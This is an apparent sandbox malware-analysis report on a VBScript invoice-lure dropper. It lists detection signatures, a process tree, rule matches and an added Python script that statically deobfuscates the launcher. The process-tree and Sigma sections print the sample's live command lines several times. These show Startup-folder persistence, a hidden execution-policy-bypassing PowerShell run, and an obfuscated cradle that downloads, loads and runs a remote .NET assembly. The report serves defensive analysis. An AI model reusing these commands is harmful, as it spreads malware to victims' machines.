Windows Analysis Report
FAKTURA-pdf-466366332.vbs

Overview

General Information

Sample name: FAKTURA-pdf-466366332.vbs
Analysis ID: 1525548
MD5: 90bd9fa957050b3641726fd4bb173281
SHA1: 4fd94ee79b46a075b9cc10f9ceecaad705a19bf8
SHA256: 07565a7b310e8082d9cfdaea1f0990c5b21ec6c08001272414cf63869019aa24
Tags: vbs, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4648 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6264 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3688 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • powershell.exe (PID: 5944 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 4832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
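The two PowerShell command lines in the tree above carry the whole delivery chain: stage 1 (PID 4832) base64-decodes $Codigo and re-launches PowerShell with -executionpolicy bypass, and stage 2 (PID 4844) hides its script behind string concatenation, a .NET -f format in which [char]36, [char]34 and [char]39 stand in for $, " and ', a URL stored backwards, and an iex alias spelled out of $VerbosePreference. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it evaluates that obfuscation statically (no PowerShell runs, nothing is downloaded) and pulls out the indicators. LAUNCHER is the stage-2 text copied from the process tree; the real stage-1 base64 value is elided on this page, so build_stage1() constructs one of the same shape for the round trip, and CODIGO_PREFIX is only the visible start of the real value as quoted in the report's Sigma match data. The alias resolution assumes $VerbosePreference holds its PowerShell default, SilentlyContinue.

```python
"""Static recovery of the stage-2 PowerShell launcher from the report's process tree."""
import base64
import re

# Stage-2 launcher body for powershell.exe PID 4844, copied from the process tree
# (the text after -command, without the enclosing double quotes).
LAUNCHER = r"(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"

# Visible start of the real stage-1 $Codigo value as quoted in the report's Sigma
# match data; the remainder of that value is not reproduced on the page.
CODIGO_PREFIX = "KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6"

FRAGMENT = re.compile(r"'((?:[^']|'')*)'")


def concat_fragments(expr):
    """Join the single-quoted pieces of a PowerShell 'a'+'b'+... expression
    ('' inside a single-quoted PowerShell string is an escaped quote)."""
    return "".join(f.replace("''", "'") for f in FRAGMENT.findall(expr))


def deobfuscate_format(expr):
    """Evaluate ('..'+'..') -f [char]N,[char]M,... without running PowerShell."""
    m = re.search(r"\)\s*-f\s*(\[char\]\d+(?:\s*,\s*\[char\]\d+)*)", expr, re.I)
    if not m:
        raise ValueError("no '-f [char]...' format operator found")
    args = [chr(int(n)) for n in re.findall(r"\[char\](\d+)", m.group(1), re.I)]
    template = concat_fragments(expr[: m.start()])
    # .NET composite formatting: {N} is replaced by the N-th argument.
    return re.sub(r"\{(\d+)\}", lambda hole: args[int(hole.group(1))], template)


def resolve_invoke_alias(expr, verbose_preference="SilentlyContinue"):
    """Resolve ([string]$VerbosePreference)[i,j]+'x' -join '' to the cmdlet name it
    spells. SilentlyContinue is PowerShell's default (assumed here); pass the value a
    changed host uses to see what the sample would pipe into instead."""
    m = re.search(r"\$verbosepreference\)\[([\d,]+)\]\+'(\w*)'\s*-join\s*''", expr, re.I)
    if not m:
        return None
    picked = "".join(verbose_preference[int(i)] for i in m.group(1).split(","))
    return picked + m.group(2)


def extract_urls(script):
    """Quoted literals that are URLs as written or once reversed (the sample
    stores the paste.ee URL backwards)."""
    urls = set()
    for lit in re.findall(r"""["']([^"']+)["']""", script):
        for cand in (lit, lit[::-1]):
            if re.match(r"https?://", cand, re.I):
                urls.add(cand)
    return sorted(urls)


def extract_static_calls(script):
    """[Type]::Method(args) calls with their double-quoted string arguments."""
    return [(typ, meth, re.findall(r'"([^"]*)"', argstr))
            for typ, meth, argstr in re.findall(r"\[([\w.]+)\]::(\w+)\(([^()]*)\)", script)]


def stage2_base64(stage2):
    """What stage 1 carries in $Codigo: the stage-2 text, UTF-8, base64-encoded."""
    return base64.b64encode(stage2.encode("utf-8")).decode("ascii")


def build_stage1(stage2):
    """Constructed stage-1 command line in the sample's shape (the real $Codigo
    value is elided on the page); used only to exercise decode_stage1 offline."""
    return ("$Codigo = '%s';$OWjuxd = [system.Text.encoding]::UTF8.GetString("
            "[system.Convert]::Frombase64String($codigo));powershell.exe "
            "-windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
            % stage2_base64(stage2))


def decode_stage1(cmdline):
    """Recover the stage-2 text from a "$Codigo = '<base64>'" command line."""
    m = re.search(r"\$codigo\s*=\s*'([A-Za-z0-9+/=]+)'", cmdline, re.I)
    if not m:
        raise ValueError("no $Codigo base64 literal found")
    return base64.b64decode(m.group(1)).decode("utf-8")


def analyze(stage2):
    """Clear-text script, the cmdlet it is piped into, URLs and static calls."""
    script = deobfuscate_format(stage2)
    return {"script": script,
            "invoke_alias": resolve_invoke_alias(stage2),
            "urls": extract_urls(script),
            "calls": extract_static_calls(script)}


if __name__ == "__main__":
    result = analyze(decode_stage1(build_stage1(LAUNCHER)))
    print(result["script"])
    print("piped into:", result["invoke_alias"])
    for url in result["urls"]:
        print("url:", url)
    for typ, meth, args in result["calls"]:
        print("call: [%s]::%s(%s)" % (typ, meth, ", ".join(repr(a) for a in args)))
```

Running it prints the clear-text script: $url is a text file on raw.githubusercontent.com whose base64 body is loaded in memory with [Reflection.Assembly]::Load, and that assembly's [dnlib.IO.Home]::VAI method receives the reversed paste.ee URL, three "desativado" flags and the string "MSBuild", which lines up with the report's "Connects to a pastebin service" and "Creates a process in suspended mode (likely to inject code)" signatures and with the dnlib.* strings in the binary-string section. The alias trick only spells "iex" while $VerbosePreference holds its default; indexing any other value yields a different token, so the chain breaks on a host that changed it, while a rule keyed on the pattern itself still fires.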
No configs have been found
Source | Rule | Description | Author | Strings
Source: Process Memory Space: powershell.exe PID: 4832, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
  • 0x251c:$b3: ::UTF8.GetString(
  • 0x2ade:$b3: ::UTF8.GetString(
  • 0x202e1:$b3: ::UTF8.GetString(
  • 0x2d92a:$b3: ::UTF8.GetString(
  • 0x2e042:$b3: ::UTF8.GetString(
  • 0x2e616:$b3: ::UTF8.GetString(
  • 0x30cbf:$b3: ::UTF8.GetString(
  • 0x31281:$b3: ::UTF8.GetString(
  • 0x31d2c:$b3: ::UTF8.GetString(
  • 0x5351e:$b3: ::UTF8.GetString(
  • 0x535cb:$b3: ::UTF8.GetString(
  • 0x53b63:$b3: ::UTF8.GetString(
  • 0x79703:$b3: ::UTF8.GetString(
  • 0x80821:$b3: ::UTF8.GetString(
  • 0x80dea:$b3: ::UTF8.GetString(
  • 0x81aba:$b3: ::UTF8.GetString(
  • 0x821d1:$b3: ::UTF8.GetString(
  • 0x82a44:$b3: ::UTF8.GetString(
  • 0x831a6:$b3: ::UTF8.GetString(
  • 0x84186:$b3: ::UTF8.GetString(
  • 0xc5efd:$b3: ::UTF8.GetString(
Source: Process Memory Space: powershell.exe PID: 4844, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
  • 0x1593a0:$b2: ::FromBase64String(
  • 0x15a392:$b2: ::FromBase64String(
  • 0x14966:$s1: -join
  • 0x15530:$s1: -join
  • 0x1befc:$s1: -JoIn
  • 0x1c4bd:$s1: -JoIn
  • 0x1c8d6:$s1: -JoIn
  • 0x443fb:$s1: -join
  • 0x44b5b:$s1: -join
  • 0x90a9c:$s1: -JoIn
  • 0x90e36:$s1: -JoIn
  • 0x9193e:$s1: -JoIn
  • 0x971f9:$s1: -JoIn
  • 0x97605:$s1: -JoIn
  • 0x9b0d4:$s1: -JoIn
  • 0x9b4ed:$s1: -JoIn
  • 0x9b907:$s1: -JoIn
  • 0x9bd66:$s1: -JoIn
  • 0x16f0ce:$s1: -join
  • 0x18aa29:$s1: -JoIn
  • 0x18ae35:$s1: -JoIn

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -comma
Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', 
'+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', 
'+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', 
'+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0M
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' 